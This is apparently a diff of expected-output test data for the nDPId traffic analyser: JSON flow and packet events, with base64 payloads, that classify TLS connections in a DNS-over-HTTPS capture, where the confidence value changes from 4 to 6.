00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946739305016,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739305016,"pkt":"REREREREZmZmZmZmCABFAAFIJYRAAL0Ggi8KAAABuf2aQugMAbv\/W2fgE34PaFAYAfYWNwAAFgMBARsBAAEXAwO7rF9fivBYq0PPnnVftpI5xv63Wth8iDXYIbCI66xBbCCVvQ4J9sHqcW\/KB2T6FVper40CtcJE9we9duJ2lwo5jAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zZXMuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIHdlaU8VTQtoxOo631cPtMLo1fhD\/NP8\/WHh2FCfWmp6"} -00909{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00909{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":946739305061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739305061,"pkt":"ZmZmZmZmRERERERECABFAAuA+UlAADkGKDK5\/ZpCCgAAAQG76AwTfg9o\/1tpAFAQAIMgbwAAFgMDAHoCAAB2AwNWoPreEkJ\/UPiZCRV0IEx6jRSqugqY3M+B37V87ydZxyCVvQ4J9sHqcW\/KB2T6FVper40CtcJE9we9duJ2lwo5jBMBAAAuADMAJAAdACB0RVn8jGqUM9fyfUTkTuhvHxWfPva1vJ9a18\/+TyUNbgArAAIDBBQDAwABARcDAwteuwCVRbAjw9pKtY4dNJzB+NkDPzUPU\/YSrAhwNpHIEK5V+o2\/HqZHUFxtVJbEBPgURU0pRFWa9dL9lQp8LuDwWHwDq1H1B4wIu6Cjn5BK872nUeQltRw5+FbrO5MDeZZJRgg48HKHnsK1mBHQnXLVwFvBE\/e\/UwSrANn9vg+B6zkss+nwjnEuw1XfKHcjr3B+gq7Tt\/pkx\/SEVt9DDhoVQjkT+nj8Ch6uFvKMxBfoNlGXQAfQ76Cfus9zBAZT5EY1YHp8kypEbWJsqWobkhk3j7efutg\/+7i\/\/3hwY3S4DA+PZFxsrSsM6AIVwaJ95fOH1dRdOyCRxbfVQ1s5uNDJcA7OdsaNR8VQ06UA5uK3FnFY9IaeCSIuzswKtKKP\/cTlEabfxoFlZbInteiv8UhvUx14oYH8877iKbTHauga0SrPYwJ3hDQ38FuPBJ16hIcickFsAxoIxHcrJTcDxD31\/+27P70ucqJUKNnKmwnMS5iCjU275dZeWQ9Zr0T4s7GAOpJ\/qhuQ0adCzilfe+zxessB1BHzKqNpomqUeAJU6wiiIZGwIQCSR9TnB+R6Furn+4OgUG6PGNdXCZNQ9itsUGoaOah9Fd+b\/mJSMoK\/FuhgIcCIxvGAml0OlSPbxxyIuGAWgYtRBimB3o6JaqY5BlDiRDxZX24w4nNBhNEgZ23H2qCY1hFOw\/NxAIqZ6i1OczcdQK5je4mFGQnk7n2Dd0xCvT\/QbVT+DGwohNzMpmrD81sKP2YRMryNcEXaCYgEk0oi4bjQNtHjwEi3WiSTxdHtROjzPbx1MuktYL6gASggOg1Ub+v8yVRI6bLdeV5Xwvz5ZxoF9vdrBEyvVBdMauaRYoyVnXm15LfrTPUCeXkHS1kWpj909RBaupD8tKI35AMNBM63GiCNIPCKacZOle5IpXYl1uAfPyEf7I7c\/Z2VAGWif0f1eRsudqghQ1VDSbMFMSOUlZF8oqR69Dp+GUrZSkzXH\/vlToVdum7PDCHkza\/W9cBDPI5wtxaPFdq19aD9CF4UXzcnY86h4hX1BAKMl5ymvY9oQmQKwLyZZk7gJ3BG3QSRRkEJLHmElRTA\/j6+UD2DUirljLXPFbrXC2eKn2CCwq3Zuv5P5wO5+t0UU\/yghFoQluNjQ3lfw4zQuwuXqm940OzzyqoEcUuHVR8IXnZ8TZqE90q8rCtGIOP+LD4hWpqBqHuwk66vMcJQgwNCFXix5ZnSXLN0BgV30sQI8N\/4QNcrVg18QrqrwMX5353ArFRERLIaGuZFxOud2tKJXNi7\/8bnQL4pfggVMDHzys0Vv2kSkmMM9AH5fy6is33XJQsCiLeVAW2BJv0HWG\/2v54ftufeuJKqjAweFaFpf8nOnSzUujidt2Hj6vD7NzSy9u5bVuAiVU8CLsOjLUQDZZwuXq5KPOpcqPkwUfO\/JhY2IYSty68WbtoEQ\/LicI5G0k7qhGVYDDLZjTT029eOEYuXI7f+lB6Kb+6SLaMGDm8r9Mw7ebinM16XyWOwJ5JBUayf+vtez432JNrnbq1SGS5rLH5Fg5ZMgKUFbGPULmfIDV2jwsa5no0weJKoBPHSF0j2z2Ws3ZeYohMSNwPof+eIkWPeDsS0odMH3bOI8vjnmbAlt1LEuTlP9Bgfbe4EZBkTArblnr1PduSYp9HHqPcDcdegoFu3tk12XJWCeAczLwMdcKTivhfzRMPv6R\/QbwvNULNcqw3kjep\/lhPa8MK5fd2CGyIw+LCWxGXv+q\/ds\/TSYSN0doo9wcXYWwj8LntYcpK6i8bE1mnU9HhfDXOdgKZheyUxq\/2aHTotcU7hlwJGxzG1S8L2XOL+e5cK\/uWYrHMSCsilBLjzbaE58\/UhgQTo4G7REl65txB7jkxytOXC2V8igiA\/VVPL1iSyOqszjZhZj\/KQ7cRXbuiY2hUvh3d1GHeunUPxkjVr7SBFLwo5npluN5uAfc+7Lx2v8sh\/0AXjRBQzrzXUGOKzmSDk4EsluiAOjG78HzOAmharQORiNXCoRaRa+fhf0Ejafe7HoDuKqj5ukCKAbsCU6se\/uViDv0Ko0frloNjTZWVHeFLAU\/8Rxbf5R8lMV480rpPEWmLytLklZol4xviBgu3uvWIUzW30atpHjpq+x1y1B4ZeqEOMO83R7O6ddmc3f06vtoo06tW\/Agu9h766pQvpNm2vTYudTnd6DSqBlKI5KeonXz4AxZiEG5DKNiVkur+pxwlM3ugAjT44z5C6NIq2xLtYBKvjI4ZiVK+oThODcy5mgGaurXo21aX3cTizFa3bH6OPqttL9gjP05Bka27HY2jgRwKVSbziiMro9AX8Xsmg6S2yWOPjJLfqZCcbtLmpaNGvdFtOkH77j4F52qkt+me41p1UftUvN6wiwxxp99NI0\/fMosQgl7ighWoY2W\/IB0fXHatEvBsmPr1KEj7P+aJaj7oNVmyRVuFHPwaBwwi7T8Vvj9wG3gSDuuYdP5+UFDM+35GxMSRkihqY1Nf52lvDc2vDx7TdolcUJnmrezHB7iOplwsA\/pnoSxDqDzY8u2hWCRC+c4jg1z3vL2zvzGplrkFak387ZT7iXl569hRQY0g6W72J\/qU\/wWvKrh5aic7Fca9+09fN8mKvizdcBFS1tmo5ud9hSP5IApLh\/AqNGAsSvFB77AMVMPcqCZqs\/LzhQ6p8mk1Ztud+POMwqvs7eCTrsyIwvCFHr3MjxRECobkoOUnKuDn6O2Ba4MeFaOtHE1XjJdkhICNgy76FwlNk7qa2miONerIZrFWrQmU2yx1Al5ihAv+BSYo7OLYt9zXUcCSntdFwaG5iWvn2D3TqvQcyGsX7n8R8YOUmBL+xEDz8\/cHI76eHoMT9Gcmgev3Cz2de\/7ilgKsoMsC9dl+Ldtg+QDnuzeji5lROtOH+fv+MRICCWa3t+oaVa2XgjAhIywmeaAGP7+W10HhLqbtIimjrrdbxpeltnnJv0HxLov9cXj+b0Pm2tBSSGlhGmiCqLRib5vepRDq5ASTdoFYCIMH422KVZztJ1b63ltyCjG5NtOVaK\/MkO7\/KWS1XPbQXAVUScApoXkKlzQiVxTCMZQoZIoE4pH0+fjzQcElC405f+pmLRfF1iVpdbRwPdWdjvokVy8bVGY3GGXVtgS7DasELvMxZruoBcMEH12JcU31nt00epqRaM7Ty\/hGPJ9RgbFIN6nscoLHLm6YFkdOMqn+3D0CMvB4x652Bu8PF5m7DHJMIBJSoh\/WEUOZDxlHi5CT9KYRNTMZDhIkJj++9o8TtwBf\/+FOKgQZYlLc9emRrICiIhqz7dIu9M1nNq8igrwodBBqfV3IJasHHoy\/F57WNpO6ufh54oPFaVKYJn1bg656yNokeiXMSkMhJsmjb0+SAmQ0rTBRRWtbjoeZCc3gkigutNXY3WNHxKSc5xsJ9iyr3gTZdRpWgWbT+isP5Ovqam4GzSglt\/k+unyjMz4\/f8vVi\/7W288anM52u2gAT5Id3RGTrtEQDPQ8UVftSrylfoNAZTKGGhUJLAcmefkYZfUt\/EB+t1\/S5DOAvsgdK0URdbVybob0RmFJKIBsQ7DYRwD\/HgqXJ6uMDVUKO9XoO+9dwhRf11sqhooAzPCeXtVLggV615qXldaBtBjJ4Fa\/LAamnbZck+pr1D1RAPJP4HQwfBLL\/eWmzwOCA4y+tqnSn"} -00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305016,"flow_last_seen":946739305061,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739305061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305016,"flow_last_seen":946739305061,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739305061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":946739305063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739305063,"pkt":"ZmZmZmZmRERERERECABFAAC4+UtAADkGMvi5\/ZpCCgAAAQG76AwTfhrA\/1tpAFAYAIPkeAAA4ov2OS2FYwHLyLK8HvldhjW58oZhz\/dEDG0qRvP07Xrr9KbrwFzXsPAENpwnRYTilEXtuGTXfjP8+51dqVC3h3Voz6vzPB2E1qN7598iQNHjvdaBjrZ71M3dNmhXs0fudaDBYxVH3HnrCgr\/VoLnr9AAImTV5ybiMJS9e3W0V7h9Z35p6EhyTXdDS8\/1x5Ew"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946739305650,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739305650,"pkt":"REREREREZmZmZmZmCABFAAFBLvBAAL0Gw1EKAAABrGhdUJ\/qAbvjN2w6lQOuzlAYAfbLqAAAFgMBARQBAAEQAwPaSOnODEW\/53X3FLI0n+Mih\/iyk2Bze7sXLhS9N0ueoyDada2r8SjLZf4K7a+NbQASLzSYT4924P6pAuqOJM8\/hgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALanAudGlhci5hcHAABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgYin8bJdqHx3ibHrbfDgwuFVcZV3PPNkWvp1zHo7\/2AM="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":946739305852,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739305852,"pkt":"ZmZmZmZmRERERERECABFAAXUYr5AADcGEPGsaF1QCgAAAQG7n+qVA67O4zdtU1AQABbJOgAAFgMDAHoCAAB2AwMioc+jlzNc+VBJaZcDKojs21jGEKcSNKyg9ExllQqy+iDada2r8SjLZf4K7a+NbQASLzSYT4924P6pAuqOJM8\/hhMDAAAuACsAAgMEADMAJAAdACAdEExo5yrIKmMZ4nrOia6UHa7Zh09ZMNUZYLDF+NYxaxQDAwABARcDAwAkT\/VVW9e6tSXUn2DgdOFI1vJ9CWMqaG0B1UgAogfcRWwpZ74dFwMDDDNZ3TFhx2HRd\/d\/BnLRqx3w9gJyapE59ga0mk6Gbdpy2uhfU1raH\/kLDwO0PHahqFeiov5PtmafDzH5oAzRDBThfFaKNK986AJtqna7+\/+W9HqZppsUeMeFtSdutMbm9VkvNNWFsngalQ8\/TjlWYt\/LNabidW0R+diEYRXkVHectSDnGgpIKw7AqJmgGmRJSQFZmk8mMFHUip8Ns8L0Qm+4mFM3OyM2y8uotBFp52jwBE4JcdWTlWvX638UUEwGd0+Jev1b4UZvqaI8gBJQiwDYthQvx2cilE03gvQZUs1gLv40OT\/eDg1VwASYtXu1QKuaTXj67d3FvJUxTfjdc9Un1x\/xpNxQ9IvL0JgGMqp5Nvz4C+qRYd\/CysKeUwM5LkGikxDP3qZXZjcRDF3CvWl\/0RJAgB68oCh4lzQ6BTBYQsLIO+2npSdMMO1mcmGxOeyAtRoiglI\/Mu+7bxclTAdkFUgpS6V0wzwluZmFW7Rx4iiSeZWVmQDKjFeHStRAafyFrtH26wCU1ei1O7zDiCd\/St5EWtAfoATjugif\/dASmeS6peR\/N837DyefuOM7XNJbAUXXdVYFQbj88dVPYC1ZWfSpl1wPAKf87TREgv6h4ZkxzRnB6COvKSvUqklCC1SSMJfennS1L0Etglf8wZsulJYWIe6+sEiyvEkrN24bb021w2X\/KuVEn+j5dyEDiGG5loD+4VYwc9G5Wa+jxRUO0+A62CO2opPif7xWIxQXRSJ441bKp\/i7j7P+cl88sdZsTxv2ygPWKGEBO4XHbg95EUra3m5LdhfhQUM\/e\/n+Ak+LAL3mStir5xjEDf9+haA4s5VbKmTRNrJtFiUwt198TeBjvlKCejLbJO6d8gE6SQECz4iM7IcNa\/bXR7adNUuu8qhullq5WfyiHcztVpItdHmrHXbaCsGaPgIKVpIJp30oUBjXbdyBrklTyARetsx+L4hfDlDZiZOEujpickcQVHRV+Rq6dF5UrRJYU3XU\/ZcqBeRvNXpu9d46M\/bhnVClgq2Bd+aOiR2kaho07AGNJ9Fr4k5Jos+2Q6DGpQasXC6x+iPauGKBp59nwGXbOOKtd8ArTxOlVzQmOZH6I0tx+iKMplPSCHR8FFec2EwXBLm\/1vyI9Pwo+zYiVdHp09rRHeJXaKGgiynxtv128gHPWfts6k\/bUS8N1Dw2y1OWa2cDxVOv79IA65ALHyABrPQbEH+byQd5tzeWrWUmzmNi3p4jdd62IgsA8HkYmsZmy5jIyKyWEYlUo1SPeqjIhX9VriaKoSoSKPFRDULdhc+03ZBXd6SKMHCSS7x6DpL0ufFkfc0ZfcGyz8s\/jngcscp5gmPQrY+VfOmrZe4EnOIAqkwdbS5Vejc5Yga2D4LRGGWgMYBm5SScqu5500ZCpE0WmkryZPm\/4OMJ47iDZWRTkVie5Ea9ONRDlM9tVglWZF\/oUiAJVVWh4mt0z6nVYUgTMbtTn0pDKN\/0TJikQ5gt3TXgtioj57ko+eiK8raQcuhqyXG3KA52lsLM2MmWuS6VxCjD2hxANDc3R7BZOaM4bmyza4JUsEms3Y5aNGYiFwaMTvyvPSX55q5QHTJ\/Mi827fNg4TtCrFRxN6XxJuU0RfIATOX3faQkD1YP1V51gStaTXEj1EBrNyqEnKqYk6Yxs2aBmn4CqaTQ7ru+2yyoapdX3D0JCzKb"} -00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305650,"flow_last_seen":946739305852,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1733,"flow_avg_l4_payload_len":866,"midstream":1,"thread_ts_msec":946739305852,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305650,"flow_last_seen":946739305852,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1733,"flow_avg_l4_payload_len":866,"midstream":1,"thread_ts_msec":946739305852,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 03431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":946739305852,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2248,"pkt_l4_len":2214,"thread_ts_msec":946739305852,"pkt":"ZmZmZmZmRERERERECABFAAi6Yr9AADcGDgqsaF1QCgAAAQG7n+qVA7R64zdtU1AYABbTIQAA7khOXiRDmimON10SUW6EdkRNtideeCAmsCP9ufTAbxPBEESbRp6rJdX9WpgeGKEcs1FSJYqSgEbwbmVZ45a190xHBVgYJoheRrXwVU8\/AsBaHDXul428WYkRrLMS2d7ip3ZonDd7PZHF6J0j5\/wI70KV9AUCOBt\/Btv4kzO+Hj+j3yK5bLSbWlRhD1fuMQAb+cF537u0\/U3MsC4OMo+87usOrwz6eMrKL+s31DCb4z6f8eENi68oRi9OZYKpoRYjhFkw0unmspSreLKjulrpWluVXrk1btWPgYpUVnavuXquTK1NtVner355EoOvAf5CAN1Y8OcMXqML8XqYMeqEg34ZtCcYr+tnetE29K921LwsoIOkJdbaiCVLTv\/9X++VjLPLL4afBqrrwx2ZkXw2VSOvNSpMcVsFQ2sks0er7rCvo3vy970zXk8N2ZRM9DEPyk4S8i+C3Yw3j6efIbDNyRRGIb1TGn6z1LzsFfHkHQ\/coPiZhIhvnK6o5iGWcHYOGEPLh4XlmZt5EnCBavREWdcXDAq+Rj+biwLLNbp9Xm75T3bbWxLQivCzGfNO2oBB8jJz2Zicez5S7098raXjnFVLWws7S\/ZjTQ11gAbLNqyHJOm\/RerOFZpkbGJsCCKjsmgBFYujoZTifdvrnskuFGuKqjRU7sBnWY38jO4yTlznAvt2Cf2\/I4bnh5roD5\/h3R\/5c28EQTDGmOL2\/KspdGSS1bjToJBQbcS2YbFnjwR5yrS+5SOLXVmRcZDGU4Ke3DaCJifWpD1EVuVb2ilryPAD8yGt9JaIe3cT9jnaxoJojKtbQNqrLa4+HAzDJSTrT+I7IXNvzHDQ5HJdRQkyKEzhMuedfOGX3aae0qJMXEdgmL8U1YL9LUgqs4gaInFpYecyGYMFaC7RpVTbVJ8AclN3JFij4ikMLs8OvolwBsIUxkwvTd2kxXvS\/GtkZpTdB40Qwypq6\/slHam9c8zmzEZ9VsQqYPOs7EU3IWXPB\/7jwR\/Swoqx9IepHlyCi3ipHUa3krt79WKeMN9slFrvDSuGQo7cCX4PwLWqGq1s8n4xGAwbb4PADqo8FJSgQHdjNMolIHMWyuqk5nqOgc0W36SeHQOxctDFxw00aD7\/ZIjnA7m+97J5Qh0XWgw5Lpsc8Mvp+VBxyMQklBuDFOyN3HJKbg943DoSjIMucZn1tzh8KOxw0Xql8+gP0Tj\/ncw8jVi\/PzuMVXmWMiQX\/wdJfEzJkJUlcXDAAE2IesO7KR0oZhnwcsaVEwrsJruOKxYtv2pbkmhOIxpFm4wJGmE+2JRFXkQDnRtvWvAJoF\/v0k69TDViO86TF2AjLFejfwjQQnCJXVkS4fuCh3i1TYrS+lUkfVezPrjjWW3F2LEdQQXJZmRfoBHSJjBhCP+Dcoc3jONSa9PXKqNJSf7Vo6MbkHB0XBcD7sdIZ2\/wIgxkllAd1uSaGBwJI8\/jhtA8RENMPWOxsz00xpbl8rHi+OkSD\/7Q58nbh7qhfzlemdSmsTNYU4yTeEr2yQTmNZcolwert2uPuF9VK2g\/3nveH2piPFCpAJOd4Z5dmxFR4fRYAGlILa5aNYiyWSR3G947wAwiYaU7l0JrzUlByQFpex9hGDkjjcctCUn8127O6yoOswVES887ts\/gfsXkn4d0JROgJbDiWFnN7j7+sZKWDkghhJYjTBSDkBNASiM9XLxgQ\/DaEwEwxYA7HjPEO\/8BxDusP8aK8hEqBPa8c8eFHdAYT3Eu2hChRagjV1O7Z0Zuc1z25GaMGiFKl7kwOrHIqt7609HLDEc8DgoFPHHr7IZJAecPMzvqj2CVzFTWl+NcGQgu1OZDB7YN8IsYE0Hj2wxjJJ4M8ncKFSWkLxvPRwAg+0hpC\/tSOqvX1jgKKAZg82Jl+tqVLBoZ773\/7qHfr\/BAX6oJ0vKtNpEDEGeMy6jjr8KxmYOPhgJuUsXOSiQKReqTW0HLQJn9LpGUn4zKU